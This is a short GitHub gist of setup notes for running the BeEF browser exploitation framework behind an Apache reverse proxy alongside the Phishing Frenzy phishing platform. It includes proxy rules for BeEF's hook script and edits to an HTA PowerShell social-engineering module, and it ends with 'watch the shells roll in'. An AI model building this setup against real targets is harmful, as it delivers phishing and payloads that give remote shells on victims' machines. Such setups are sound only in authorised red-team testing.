Created
July 16, 2015 13:13
-
-
Save Meatballs1/8770770066d2baa67376 to your computer and use it in GitHub Desktop.
Beef Mod Proxy
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Here are the additional steps I had to put in place on a Kali linux VM | |
to integrate BeEF and pishing-frenzy using mod_proxy as a reverse | |
proxy. I'm certain this could be done more elegantly but this worked | |
for my immediate needs. I'll also mention the evasion techniques | |
within BeEF work amazing well. | |
Install mod_proxy | |
apt-get install -y libapache2-mod-proxy-html libxml2-dev | |
enable mod_proxy | |
a2enmod proxy | |
a2enmod proxy_http | |
a2enmod proxy_ajp | |
a2enmod rewrite | |
a2enmod deflate | |
a2enmod headers | |
a2enmod proxy_balancer | |
a2enmod proxy_connect | |
a2enmod proxy_html | |
config vhost to use mod_proxy (I just modified 1.conf with the following) (the ui portion is optional) | |
ProxyRequests Off | |
ProxyPreserveHost On | |
ProxyPass /bh.js http://127.0.0.1:8080/bh.js | |
ProxyPassReverse /bh.js http://127.0.0.1:8080/bh.js | |
ProxyPass /dh http://127.0.0.1:8080/dh | |
ProxyPassReverse /dh http://127.0.0.1:8080/dh | |
ProxyPass /ps http://127.0.0.1:8080/ps | |
ProxyPassReverse /ps http://127.0.0.1:8080/ps | |
ProxyPass /ui http://127.0.0.1:8080/ui | |
ProxyPassReverse /ui http://127.0.0.1:8080/ui | |
Order allow,deny | |
Allow from all | |
Order allow,deny | |
Allow from all | |
Order allow,deny | |
Allow from all | |
Order allow,deny | |
Allow from all | |
configure beef to be proxy aware (edit beef/config.yaml and change...) | |
host: "localhost" # Bind to loopback | |
server port: "8080" # Port on 127.0.0.1 | |
public: "www.example.com" # Public site | |
public_port: "80" # Public port | |
change modules/social_engineering/hta_powershell/command.js the 'hta_url' variable to: | |
var hta_url = '<%= @domain %>' + '<%= @ps_url %>' + '/hta'; | |
I have to hard code the the landing page URL in modules/social_engineering/hta_powershell/module.rb | |
{'name' => 'domain', 'ui_label' => 'Serving Domain (BeEF server)', | |
'value' => "http://www.example.com"}, | |
kick campaign and watch the shells roll in |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment